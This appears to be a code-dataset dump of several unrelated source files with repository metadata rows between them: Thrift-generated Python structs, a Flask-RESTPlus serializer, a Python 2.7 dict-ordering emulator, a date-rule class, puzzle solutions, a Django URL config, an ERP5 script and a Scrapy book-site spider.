def __ne__(self, other):
return not (self == other)
all_structs.append(testMulti_args)
testMulti_args.thrift_spec = (
None, # 0
(1, TType.BYTE, 'arg0', None, None, ), # 1
(2, TType.I32, 'arg1', None, None, ), # 2
(3, TType.I64, 'arg2', None, None, ), # 3
(4, TType.MAP, 'arg3', (TType.I16, None, TType.STRING, 'UTF8', False), None, ), # 4
(5, TType.I32, 'arg4', None, None, ), # 5
(6, TType.I64, 'arg5', None, None, ), # 6
)
class testMulti_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMulti_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMulti_result)
testMulti_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct, None], None, ), # 0
)
class testException_args(object):
"""
Attributes:
- arg
"""
__slots__ = (
'arg',
)
def __init__(self, arg=None,):
self.arg = arg
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.arg = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testException_args')
if self.arg is not None:
oprot.writeFieldBegin('arg', TType.STRING, 1)
oprot.writeString(self.arg.encode('utf-8') if sys.version_info[0] == 2 else self.arg)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testException_args)
testException_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'arg', 'UTF8', None, ), # 1
)
class testException_result(object):
"""
Attributes:
- err1
"""
__slots__ = (
'err1',
)
def __init__(self, err1=None,):
self.err1 = err1
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err1 = Xception()
self.err1.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testException_result')
if self.err1 is not None:
oprot.writeFieldBegin('err1', TType.STRUCT, 1)
self.err1.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testException_result)
testException_result.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err1', [Xception, None], None, ), # 1
)
class testMultiException_args(object):
"""
Attributes:
- arg0
- arg1
"""
__slots__ = (
'arg0',
'arg1',
)
def __init__(self, arg0=None, arg1=None,):
self.arg0 = arg0
self.arg1 = arg1
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.arg0 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.arg1 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMultiException_args')
if self.arg0 is not None:
oprot.writeFieldBegin('arg0', TType.STRING, 1)
oprot.writeString(self.arg0.encode('utf-8') if sys.version_info[0] == 2 else self.arg0)
oprot.writeFieldEnd()
if self.arg1 is not None:
oprot.writeFieldBegin('arg1', TType.STRING, 2)
oprot.writeString(self.arg1.encode('utf-8') if sys.version_info[0] == 2 else self.arg1)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMultiException_args)
testMultiException_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'arg0', 'UTF8', None, ), # 1
(2, TType.STRING, 'arg1', 'UTF8', None, ), # 2
)
class testMultiException_result(object):
"""
Attributes:
- success
- err1
- err2
"""
__slots__ = (
'success',
'err1',
'err2',
)
def __init__(self, success=None, err1=None, err2=None,):
self.success = success
self.err1 = err1
self.err2 = err2
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err1 = Xception()
self.err1.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.err2 = Xception2()
self.err2.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMultiException_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err1 is not None:
oprot.writeFieldBegin('err1', TType.STRUCT, 1)
self.err1.write(oprot)
oprot.writeFieldEnd()
if self.err2 is not None:
oprot.writeFieldBegin('err2', TType.STRUCT, 2)
self.err2.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMultiException_result)
testMultiException_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct, None], None, ), # 0
(1, TType.STRUCT, 'err1', [Xception, None], None, ), # 1
(2, TType.STRUCT, 'err2', [Xception2, None], None, ), # 2
)
class testOneway_args(object):
"""
Attributes:
- secondsToSleep
"""
__slots__ = (
'secondsToSleep',
)
def __init__(self, secondsToSleep=None,):
self.secondsToSleep = secondsToSleep
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.secondsToSleep = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testOneway_args')
if self.secondsToSleep is not None:
oprot.writeFieldBegin('secondsToSleep', TType.I32, 1)
oprot.writeI32(self.secondsToSleep)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testOneway_args)
testOneway_args.thrift_spec = (
None, # 0
(1, TType.I32, 'secondsToSleep', None, None, ), # 1
)
fix_spec(all_structs)
del all_structs
| [
"[email protected]"
] | |
67b2a9dd24d52509e01bfca824c18c8a25229ef6 | 52e2224538bfa7e69f9e0688dc49c53a247070d7 | /app/api/serializers/offers.py | 5a8539cca5bad81d59223205eb8855f955c825cc | [] | no_license | averdier/epsi_my_learning_chain_api | 2958f8ab6333e87f8b5d1a97f8d485361cdcba9d | ea85dced579f6285f3acd0edd0d64ead4f6f2332 | refs/heads/master | 2022-12-09T19:56:27.836637 | 2018-04-13T09:23:46 | 2018-04-13T09:23:46 | 129,227,310 | 1 | 0 | null | 2022-12-08T01:02:30 | 2018-04-12T09:32:18 | Python | UTF-8 | Python | false | false | 1,666 | py | # -*- coding: utf-8 -*-
from flask_restplus import fields
from .nested import facilitator_nested, api
offer_post_model = api.model('Offer POST model', {
'name': fields.String(required=True, min_length=4, description='Name'),
'tags': fields.List(fields.String(), required=False, description='Tags'),
'price': fields.Integer(required=True, min=0, description='Price'),
'description': fields.String(required=False, description='Description')
})
offer_patch_model = api.model('Offer PATCH model', {
'name': fields.String(required=False, min_length=4, description='Name'),
'tags': fields.List(fields.String(), required=False, description='Tags'),
'price': fields.Integer(required=False, min=0, description='Price'),
'description': fields.String(required=False, description='Description')
})
offer_minimal_model = api.model('Offer minimal model', {
'id': fields.String(required=True, description='Offer ID'),
'facilitator_id': fields.String(required=True, description='Facilitator ID', attribute=lambda o: o.facilitator.id),
'name': fields.String(required=True, description='Name'),
'tags': fields.List(fields.String(), required=True, description='Tags'),
'price': fields.Integer(required=True, description='Price')
})
offer_model = api.inherit('Offer model', offer_minimal_model, {
'description': fields.String(required=True, description='Description'),
'facilitator': fields.Nested(facilitator_nested, required=True, description='Facilitator')
})
offer_container = api.model('Offer container', {
'offers': fields.List(fields.Nested(offer_minimal_model), required=True, description='Offers list')
}) | [
"[email protected]"
] | |
68bce261a32438af944cc7a39d301fd1bed0c9b1 | e260e72c6d8f24ef250173025b2ecf129960cf03 | /src/python/py27hash/key.py | 34b6e925ab62923b6e110a518a7371a6aa5cb145 | [
"MIT"
] | permissive | neuml/py27hash | 1cdce30b9480ff338ca0488c2d80a196fc783370 | 4d814de4ab616f33bb2d74c687e74fa57c399a56 | refs/heads/master | 2022-11-23T21:21:56.220330 | 2022-11-20T12:45:21 | 2022-11-20T12:45:21 | 223,510,843 | 11 | 3 | MIT | 2022-03-27T14:46:02 | 2019-11-23T00:57:33 | Python | UTF-8 | Python | false | false | 5,425 | py | """
Compatibility methods to support Python 2.7 style key iteration in Python 3.X+
This is designed for compatibility not performance.
"""
import ctypes
# pylint: disable = E0401
from .hash import Hash
class Keys(object):
"""
Compatibility class to support Python 2.7 style iteration in Python 3.X+
Logic ported from the 2.7 Python branch: cpython/Objects/dictobject.c
Logic ported from the 2.7 Python branch: cpython/Objects/setobject.c
"""
# Min dict size
MINSIZE = 8
# Hash collisions
PERTURB_SHIFT = 5
def __init__(self):
"""
Initializes a keys object.
"""
self.keylist = []
self.keysort = None
# Python 2 dict default size
self.mask = Keys.MINSIZE - 1
def __setstate__(self, state):
"""
Overrides default pickling object to force re-adding all keys and match Python 2.7 deserialization logic.
Args:
state: input state
"""
self.__dict__ = state
keys = self.keys()
# Clear keys and re-add to match deserialization logic
self.__init__()
for k in keys:
self.add(k)
def __iter__(self):
"""
Default iterator.
Returns:
iterator
"""
return iter(self.keys())
def keys(self):
"""
Returns keys ordered using Python 2.7's iteration algorithm.
Method: static PyDictEntry *lookdict(PyDictObject *mp, PyObject *key, register long hash)
Returns:
list of keys
"""
if not self.keysort:
keys = []
hids = set()
for k in self.keylist:
# C API uses unsigned values
h = ctypes.c_size_t(Hash.hash(k)).value
i = h & self.mask
hid = i
perturb = h
while hid in hids:
i = (i << 2) + i + perturb + 1
hid = i & self.mask
perturb >>= Keys.PERTURB_SHIFT
keys.append((hid, k))
hids.add(hid)
# Cache result - performance - clear if more keys added
self.keysort = [v for (k, v) in sorted(keys, key=lambda x: x[0])]
return self.keysort
def add(self, key):
"""
Called each time a new item is inserted. Tracks via insertion order and will maintain the same order
as a dict in Python 2.7.
Method: static int dict_set_item_by_hash_or_entry(register PyObject *op, PyObject *key, long hash,
PyDictEntry *ep, PyObject *value)
Args:
key: key to add
"""
# Add key to list. If this is a replace/update then size won't change.
if key and key not in self.keylist:
# Append key to list
self.keylist.append(key)
# Clear cached keys
self.keysort = None
# Resize dict if 2/3 capacity
if len(self.keylist) * 3 >= ((self.mask + 1) * 2):
# Reset key list to simulate the dict resize + copy operation
self.keylist = self.keys()
self.keysort = None
self.setMask()
def remove(self, key):
"""
Remove a key from the backing list.
Args:
key: key to remove
"""
if key in self.keylist:
# Remove key from list
self.keylist.remove(key)
# Clear cached keys
self.keysort = None
def merge(self, d):
"""
Merges keys from an existing iterable into this key list.
Method: int PyDict_Merge(PyObject *a, PyObject *b, int override)
Args:
d: input dict
"""
# PyDict_Merge initial merge size is double the size of the current + incoming dict
if (len(self.keylist) + len(d)) * 3 >= (self.mask + 1) * 2:
self.setMask((len(self.keylist) + len(d)) * 2)
# Copy actual keys
for k in d:
self.add(k)
def copy(self):
"""
Makes a copy of self.
Method: PyObject *PyDict_Copy(PyObject *o)
Returns:
copy of self
"""
# Copy creates a new object and merges keys in
new = Keys()
new.merge(self.keys())
return new
def pop(self):
"""
Pops the top element from the sorted keys if it exists. Returns None otherwise.
Method: static PyObject *dict_popitem(PyDictObject *mp)
Return:
top element or None if Keys is empty
"""
if self.keylist:
# Pop the top element
value = self.keys()[0]
self.remove(value)
return value
return None
def setMask(self, request=None):
"""
Key based on the total size of this dict. Matches ma_mask in Python 2.7's dict.
Method: static int dictresize(PyDictObject *mp, Py_ssize_t minused)
"""
if not request:
length = len(self.keylist)
# Python 2 dict increases by a factor of 4 for small dicts, 2 for larger ones
request = length * (2 if length > 50000 else 4)
newsize = Keys.MINSIZE
while newsize <= request:
newsize <<= 1
self.mask = newsize - 1
| [
"[email protected]"
] | |
fc451ae5171ff6413eb5371ac7f7c792cf544866 | e874e3b4312b2beebaa42fa1489b50c618055190 | /venv/Lib/site-packages/onyx/core/datatypes/rdate.py | 96d0f5c2af82ec4900dac49253b490f6f1a8a386 | [] | no_license | CarlosDinart/PUC-SP | 611a9acb6a82b7db2174d2d439b5666db48a530e | 5f5f1ea4b9c55c7d20b2dcd92c461b3d8ebbb664 | refs/heads/master | 2023-01-23T06:46:42.492764 | 2020-12-09T19:41:01 | 2020-12-09T19:41:01 | 320,058,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,973 | py | ###############################################################################
#
# Copyright: (c) 2015 Carlo Sbraccia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
from .date import Date
from .holiday_cal import HolidayCalendar
from dateutil.relativedelta import relativedelta, MO, WE, FR
import datetime
import re
__all__ = ["RDate"]
QUARTER_FIRST_MTH = [1, 1, 1, 4, 4, 4, 7, 7, 7, 10, 10, 10]
SPLITTER = re.compile("([\+,\-]\d*\w+)")
OPERANDS = {"+", "-"}
###############################################################################
class RDate(object):
"""
A date shift object that can be added to Dates to generate shifted dates.
"""
__slots__ = ("date_rule", "calendar")
# -------------------------------------------------------------------------
def __init__(self, date_rule, calendar=None):
"""
Inputs:
date_rule - a string specifying relative shift (see below for valid
date rules).
calendar - a holiday calendar used to identify business days
Rule definitions:
d = add calendar day
b = add business day
w = add calendar week
m = add calendar month
y = add calendar year
c = go to the required day in the month
e = go to end of month (ignores num)
J = go to first calendar day of month (ignores num)
M = go to closest Monday as specified by num
W = go to closest Wednesday as specified by num
F = go to closest Friday as specified by num
q = go to beginning of the quarter (ignores num)
Q = go to end of the quarter (ignores num)
A = go to beginning of the year (ignores num)
E = go to end of the year (ignores num)
"""
# --- use parent class setattr because RDate is implemented as an
# immutable class
super().__setattr__("date_rule", date_rule)
super().__setattr__("calendar", calendar or HolidayCalendar())
# -------------------------------------------------------------------------
def __setattr__(self, attr, value):
raise AttributeError("attribute '{0:s}' of RDate is not settable "
"as RDate is an immutable class".format(attr))
# -------------------------------------------------------------------------
def apply_rule(self, d):
# --- rule processing. If no operator is defined assume it's "+"
if self.date_rule[0] in OPERANDS:
atomic = SPLITTER.split(self.date_rule)[1::2]
else:
atomic = SPLITTER.split("+" + self.date_rule)[1::2]
# --- iteratively apply each atomic rule
for rule in atomic:
op = rule[0:-1]
r = rule[-1]
if op in OPERANDS:
op += "1"
# --- look for the proper rule to apply
if r == "d":
d += relativedelta(days=int(op))
elif r == "b":
nb = int(op[1:])
op1 = int(op[0] + "1")
if nb == 0 and self.calendar.is_holiday(d):
# --- go to the next (or previous) business day only if
# d is not already a business day
nb = 1
for i in range(nb):
d += relativedelta(days=op1)
while self.calendar.is_holiday(d):
d += relativedelta(days=op1)
elif r == "w":
d += relativedelta(weeks=int(op))
elif r == "m":
d += relativedelta(months=int(op))
elif r == "y":
d += relativedelta(years=int(op))
elif r == "c":
d += relativedelta(day=int(op))
elif r == "e":
d += relativedelta(day=31)
elif r == "J":
d += relativedelta(day=1)
elif r == "M":
d += relativedelta(weekday=MO(int(op)))
elif r == "W":
d += relativedelta(weekday=WE(int(op)))
elif r == "F":
d += relativedelta(weekday=FR(int(op)))
elif r == "q":
d = d.replace(day=1, month=QUARTER_FIRST_MTH[d.month-1])
elif r == "Q":
d = d.replace(day=1, month=QUARTER_FIRST_MTH[d.month-1]+2)
d += relativedelta(day=31)
elif r == "A":
d = d.replace(day=1, month=1)
elif r == "E":
d = d.replace(day=31, month=12)
else:
raise NameError("Atomic rule {0:s} is unknown. "
"Full rule is {1:s}".format(r, rule))
# --- conversion to Date is needed here because applying a
# relativedelta to a Date returns a datetime object
return Date.parse(d)
# -------------------------------------------------------------------------
# relative date algebra
def __radd__(self, date):
# --- check against the supercalss datetime.datetime
if not isinstance(date, (datetime.date, datetime.datetime)):
raise ValueError("RDate can only be applied to a Date. "
"{0!s} was passed instead".format(date.__class__))
return self.apply_rule(date)
| [
"[email protected]"
] | |
6828a845e8b4a33abe9c434db3f96ee98f8001fa | 36b624c0b7f0e691772f7521695c02f0709f9f89 | /day8.py | cc9d00263a5a71ed2da284db2e9df17031b7dd4f | [] | no_license | alex-huff/advent-of-code-2020 | 4ee30fdcd6b67aceb0c0fb919de9a18f61d9987c | 701cfcba1c952710c0bf0b9336f670141a9ac276 | refs/heads/main | 2023-02-02T13:51:37.722815 | 2020-12-22T01:32:21 | 2020-12-22T01:32:21 | 323,081,866 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | def getValueBeforeLoop(code):
acc = 0
pc = 0
executionSet = set()
finished = False
while True:
if pc == len(code) - 1:
finished = True
break
if pc in executionSet:
break
inst = code[pc][0]
value = code[pc][1]
executionSet.add(pc)
if inst == NOP:
pc += 1
elif inst == ACC:
acc += value
pc += 1
elif inst == JMP:
pc += value
return (acc, finished)
def getInstruction(line, iSet):
operation = iSet.index(line[:line.index(' ')])
value = int(line[line.index(' ') + 1:])
return [operation, value]
raw_input = []
NOP = 0
ACC = 1
JMP = 2
instructionSet = ['nop', 'acc', 'jmp']
with open('input/day8input.txt') as file:
raw_input = [line.rstrip() for line in file]
code = [getInstruction(line, instructionSet) for line in raw_input]
# part 1
print(getValueBeforeLoop(code))
# part 2
for i, operation in enumerate(code):
if operation[0] == NOP:
operation[0] = JMP
result = getValueBeforeLoop(code)
if result[1] == True:
print(i, result[0], operation[0], operation[1])
break
else:
# revert
operation[0] = NOP
elif operation[0] == JMP:
operation[0] = NOP
result = getValueBeforeLoop(code)
if result[1] == True:
print(i, result[0], operation[0], operation[1])
break
else:
# revert
operation[0] = JMP
| [
"[email protected]"
] | |
301d507040d644d6ddc8e77d11c75c42c9c382f2 | 81fe7f2faea91785ee13cb0297ef9228d832be93 | /HackerRank/Contests/101Hack42/cutting_paper_squares.py | fc51e8c2e28f90db86021f38bf68df6bf3be5567 | [] | no_license | blegloannec/CodeProblems | 92349c36e1a35cfc1c48206943d9c2686ea526f8 | 77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e | refs/heads/master | 2022-05-16T20:20:40.578760 | 2021-12-30T11:10:25 | 2022-04-22T08:11:07 | 54,330,243 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | #!/usr/bin/env python
import sys
# any way of cutting is minimal and uses n*m-1 cuts
n,m = map(int,sys.stdin.readline().split())
print n*m-1
| [
"[email protected]"
] | |
e3f89f91d8c69abb44601e70897a53673388b28d | 87fdd8850df131b1f5df60ecad781ce0e79b1d28 | /models4CWProject/models4CWProject/urls.py | c80e8822580ca1366f5b958b11c6c5ceffeca4e2 | [] | no_license | cs-fullstack-2019-spring/django-models4-cw-Joshtg1104 | 3e1094fca12df27abbed756b137ff5f8d14a730c | 7a3e1e8a6e965ad63f9a9cc1799f55a89aa9f4d6 | refs/heads/master | 2020-04-24T12:09:08.907751 | 2019-02-24T22:17:19 | 2019-02-24T22:17:19 | 171,947,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | """models4CWProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('models4App.urls'))
]
| [
"[email protected]"
] | |
300abebbed2333e357357a47e73f19850524efd9 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/392/usersdata/310/71048/submittedfiles/formula.py | ea9ddc63827097528e7fa6c3641fd8e29889c94f | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | # -*- coding: utf-8 -*-
# STARTING
p = float(input('Digite o valor de p: '))
i = float(input('Digite o valor de i: '))
n = float(input('Digite o valor de n: '))
v = p*((((1+i)**n)-1)/i)
print ('%.2f' %v )
| [
"[email protected]"
] | |
513c734e5f42fa3c0906eb3309cba7ef169d6c1b | a7da58ad91b007b3650003708eb91928f1e3684a | /bt5/erp5_pdm/SkinTemplateItem/portal_skins/erp5_pdm/SupplyLine_init.py | c4b6e6d09c91538afb94bb6ecf72091943ac25a9 | [] | no_license | jgpjuniorj/j | 042d1bd7710fa2830355d4312a6b76103e29639d | dc02bfa887ffab9841abebc3f5c16d874388cef5 | refs/heads/master | 2021-01-01T09:26:36.121339 | 2020-01-31T10:34:17 | 2020-02-07T04:39:18 | 239,214,398 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | # XXX Set a resource for the supply line inside a resource
parent_value = context.getParentValue()
if parent_value.getPortalType() in context.getPortalResourceTypeList():
context.setResourceValue(parent_value)
# Predicate ?
context.setMappedValuePropertyList([
'base_price', 'additional_price',
'discount_ratio', 'exclusive_discount_ratio',
'surcharge_ratio', 'variable_additional_price',
'non_discountable_additional_price',
'priced_quantity', 'base_unit_price',
])
| [
"[email protected]"
] | |
2d157e6b043c49bbf4392ba1010da1ab43617f94 | 1698fe3ff15a6737c70501741b32b24fe68052f4 | /py-elasticsearch-django-master/spider/ESearch/spiders/haoyang_spider.py | a227d4b4b41603f8a992a695342ceb534df4a4bb | [] | no_license | menhswu/djangoapps | 4f3718244c8678640af2d2a095d20a405e337884 | 039a42aa9d1537e7beb4071d86bea7a42253d8b3 | refs/heads/master | 2023-03-04T03:56:01.070921 | 2021-01-28T07:35:02 | 2021-01-28T07:35:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,937 | py | # -*- coding:utf-8 -*-
import scrapy
import re
import urllib2
from scrapy.http import Request
from scrapy import Selector
from ESearch.items import XiangmuItem
from ESearch.utils.common import get_md5
# 32406
class DmozSpider(scrapy.Spider):
name = "haoyang"
start_urls = []
main_url = "http://www.9lizhi.com"
def start_requests(self):
file_object = open(r'haoyang_url.csv', 'r')
try:
for line in file_object:
x = line.strip()
self.start_urls.append(x)
for url in self.start_urls:
yield self.make_requests_from_url(url)
finally:
file_object.close()
def parse(self, response):
item = XiangmuItem()
item["book_name"] = ''
item["book_author"] = ''
item["book_type"] = ''
item["book_format"] = ''
item["book_time"] = ''
item["book_url"] = ''
item["book_size"] = ''
item["book_downl_url"] = ''
item["book_source"] = ''
item["book_intro"] = ''
item["book_content"] = ''
item["book_zip_pswd"] = ''
item["book_chinese"] = ''
item["book_id"] = ''
selector = Selector(response)
is_lists_page = selector.xpath('//ul[@id="resultsContainer"]')
if is_lists_page:
info_lists = is_lists_page.xpath('li/div[@class="item_title"]/strong/h2/a/@href').extract()
for each in info_lists:
yield Request(each, callback=self.parse)
page_lists = is_lists_page.xpath('//select[@name="select"]/option/@value').extract()
for each_page in page_lists[1:-1]:
yield Request(self.main_url + each_page, callback=self.parse)
pass
is_info_page = selector.xpath('//div[@id="detail"]')
if is_info_page:
item['book_url'] = response.url
item['book_id'] = get_md5(response.url)
item['book_downl_url'] = response.url
type = selector.xpath('//div[@class="posi"]/a/text()').extract()
type_url = selector.xpath('//div[@class="posi"]/a/@href').extract()
if "http://www" in type_url[-1]:
item['book_type'] = type[-2]
else:
item['book_type'] = type[-1]
information = is_info_page.xpath('div[@class="tb-detail-hd"]')
item['book_name'] = information.xpath('h1/text()').extract()
time = information.xpath('li[@class="dated"]/span[@class="datetime"]/text()').extract()
time = ''.join(time).split(':')[-1]
item['book_time'] = time
author = information.xpath('li[@class="dated"]/span[@class="author"]/text()').extract()
item['book_author'] = ''.join(author).replace('\r', '').replace('\n', '')
yield item
| [
"[email protected]"
] | |
44b3f8b9bf6336102b52df080e47ad6e0a0e1c8d | 297497957c531d81ba286bc91253fbbb78b4d8be | /third_party/python/gyp/test/win/gyptest-quoting-commands.py | c6e3167e76c582ad10c5852afaa2c21f62439533 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
